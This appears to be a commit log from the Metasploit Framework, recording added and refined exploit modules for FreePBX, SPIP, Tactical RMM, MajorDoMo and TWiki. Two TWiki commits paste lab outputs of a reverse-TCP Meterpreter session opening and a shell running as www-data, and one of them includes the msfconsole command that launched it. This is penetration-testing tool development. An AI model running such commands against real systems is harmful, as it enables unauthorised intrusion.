c42e44e349
Optimize FreePBX module: cache auth/version, reduce verbosity, inline single-use functions
2026-03-11 19:43:29 +01:00
63c5221f8a
Update modules/exploits/unix/http/freepbx_filestore_cmd_injection.rb
...
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com >
2026-03-11 19:43:29 +01:00
b039d8a575
Update modules/exploits/unix/http/freepbx_filestore_cmd_injection.rb
...
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com >
2026-03-11 19:43:29 +01:00
36b294800b
Simplify version extraction: use match directly and remove redundant regex validation
2026-03-11 19:43:28 +01:00
c266e687c2
Add authenticated RCE module for FreePBX filestore (CVE-2025-64328)
2026-03-11 19:43:28 +01:00
c6aabc1c75
Land #21001 , adds module for SPIP Saisies plugin (CVE-2025-71243)
...
Add SPIP Saisies plugin RCE module (CVE-2025-71243)
2026-03-09 10:34:52 +01:00
628275ef59
Revert "This adjusts module options that need a routable address"
2026-03-08 17:37:49 +00:00
1ec87b586a
Merge pull request #20989 from zeroSteiner/feat/lib/mod-address-opts
...
This adjusts module options that need a routable address
2026-03-05 11:46:52 -05:00
59a1992214
Land #21017 , adds module for SSTI in Tactical RMM (CVE-2025-69516)
...
Add Tactical RMM Jinja2 SSTI RCE module (CVE-2025-69516)
2026-03-05 15:38:32 +01:00
3d38e9b27b
Fix: Fallback check to Detected when plugin version unavailable
...
- Use spip_version as fallback when spip_plugin_version fails
- Return Detected instead of Unknown so AutoCheck does not abort
- Fix lab healthcheck to wait for saisies form before reporting healthy
2026-03-05 14:13:05 +01:00
4534a8a07e
Fix: Address msutovsky-r7 PR review feedback
...
- Add IOC_IN_LOGS to SideEffects (POST payload may appear in app logs)
- Pass page parameter via vars_get instead of embedding in URI string
- Apply vars_get consistently in crawl seed request
2026-03-05 14:07:22 +01:00
bf41455bca
Fix: Address review feedback - remove dead execute_command, fix dropper race condition
2026-03-05 14:01:12 +01:00
36ba1608af
Remove more unnecessary my_host definitions
2026-03-03 09:37:27 -05:00
ea915acba3
Appease rubocop
2026-03-03 09:37:27 -05:00
1b39311784
Remove redundant definitions of SRVHOST
2026-03-03 09:37:27 -05:00
821e3c28f1
Replace old patterns with srvhost_addr
2026-03-03 09:37:27 -05:00
132ef661d3
Update usage within binding operations
2026-03-03 09:37:27 -05:00
6e38f8568c
Update tftphost usage in cmd stagers
2026-03-03 09:37:27 -05:00
b7fc0c6613
Replace usage of #lookup_lhost
2026-03-03 09:37:27 -05:00
9df6879a95
Update modules to use srvhost method
2026-03-03 09:37:25 -05:00
758ac7f2f6
Apply rubocop changes
2026-03-03 09:34:49 -05:00
fc49421939
Replace checks for nonroutable addresses
...
This consolidates modules that check for a nonroutable SRVHOST value and
replaces it with OptAddressRoutable, defaulting to a reasonable address.
2026-03-03 09:34:49 -05:00
a0fb02bd45
Default the address in the SMB share mixin
2026-03-03 09:34:49 -05:00
92e77de800
Update to use OptAddressRourtable for SRVHOST
2026-03-03 09:34:48 -05:00
9ea5a54fe9
Merge pull request #20940 from g0tmi1k/twiki_search
...
twiki_search: Fix exploit, more verbose, error handling, add fetch payload support
2026-03-02 17:55:50 -06:00
9664ab5191
Merge pull request #20946 from g0tmi1k/twiki_history
...
twiki_history: Add revision+page options & Fetch payload support
2026-03-02 13:58:44 -06:00
7545328be1
Linting
2026-03-02 15:02:56 +00:00
1a4ae7bfa3
Fix broken module url references
2026-03-02 14:35:48 +00:00
6f84c83135
Merge pull request #21000 from Chocapikk/add-modules-majordomo-rce
...
Add three MajorDoMo unauthenticated RCE modules
2026-03-02 05:20:22 -05:00
615ca34e29
Fix: Remove explicit timeouts from send_request_cgi calls
2026-02-27 14:42:00 +01:00
6923badeac
Fix: Use background thread for cycle.php bootstrap instead of timeout
2026-02-27 14:34:24 +01:00
76d103e483
Fix: Bootstrap cycle tables and update lab documentation
...
Add cycle.php bootstrap request in cmd_injection module to create
missing MEMORY tables before starting the cycle_execs.php worker.
Update all three module docs with curl in Dockerfile, Docker gateway
instructions, Options sections, and verified scenario outputs.
2026-02-27 14:33:04 +01:00
097a4700cb
Fix: check method returns CheckCode instead of fail_with on login failure
2026-02-26 17:13:57 +01:00
11806c983d
Update modules/exploits/linux/http/tacticalrmm_ssti_rce_cve_2025_69516.rb
...
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com >
2026-02-26 17:12:42 +01:00
218c8df3bd
twiki_search: Drop MeterpreterTryToFork & fail_with
2026-02-26 09:35:50 +00:00
fd1d10ec28
twiki_history: Drop MeterpreterTryToFork & fail_with
2026-02-26 09:27:53 +00:00
801bc77ec8
twiki_search: Add Linux fetch payload support
...
Fetch over CmdStager
- - -
Without MeterpreterTryToFork:
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:49864) at 2026-02-19 17:22:57 +0000
[*] Payload sent
[-] Exploit aborted due to failure: unknown: Error sending exploit request
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/twiki_search) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 4935 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
2026-02-26 07:12:47 +00:00
529b53ecc4
twiki_search: Add send_request() function
...
This is based on MR feedback
2026-02-26 07:12:47 +00:00
188832d68f
twiki_search: Var consistencies
...
Sorry, not sorry
2026-02-26 07:12:47 +00:00
1d40b352a5
twiki_search: Consistency with exploit & check
...
Payload & formatting was slightly different
2026-02-26 07:12:47 +00:00
0395a27358
twiki_search: Improve error handing
2026-02-26 07:12:47 +00:00
71845d44a1
twiki_search: Be more verbose
2026-02-26 07:12:47 +00:00
627c1272da
twiki_search: Add versions to description
...
REF: https://web.archive.org/web/20221006175642/https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
2026-02-26 07:12:47 +00:00
c7ffa09f01
twiki_search: Add SEARCH_PATH & switch default
...
/search/Main/SearchResult - https://www.exploit-db.com/exploits/642 *Works for me*
/view/Main/WebSearch - https://github.com/rapid7/metasploit-framework/commit/6414821ea860c6f33d9129d9af0e9648be5972a9 *Fails for me*
2026-02-26 07:12:47 +00:00
6c804749f2
twiki_search: Switch from > to |tee
...
Otherwise:
> sh: gt: command not found
2026-02-26 07:12:47 +00:00
0b1687b5d5
twiki_history: Add Linux fetch payload support
...
Fetch over CmdStager
- - -
Without MeterpreterTryToFork:
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/webapp/twiki_history; set payload cmd/linux/http/x86/meterpreter/reverse_tcp; run'
[...]
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:40453) at 2026-02-19 19:30:07 +0000
[*] Payload sent
[-] Exploit aborted due to failure: unknown: Error sending exploit request
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/twiki_history) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 5042 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
2026-02-26 07:12:43 +00:00
a22698205e
twiki_history: Add send_request() function
...
This is based on MR feedback
2026-02-26 07:12:43 +00:00
b393381296
twiki_history: Var consistencies
...
Sorry, not sorry
2026-02-26 07:12:42 +00:00
3adcfb8825
twiki_history: Improve error handing
2026-02-26 07:12:42 +00:00
4530fb3d13
twiki_history: Be more verbose
2026-02-26 07:12:42 +00:00
Valentin Lobstein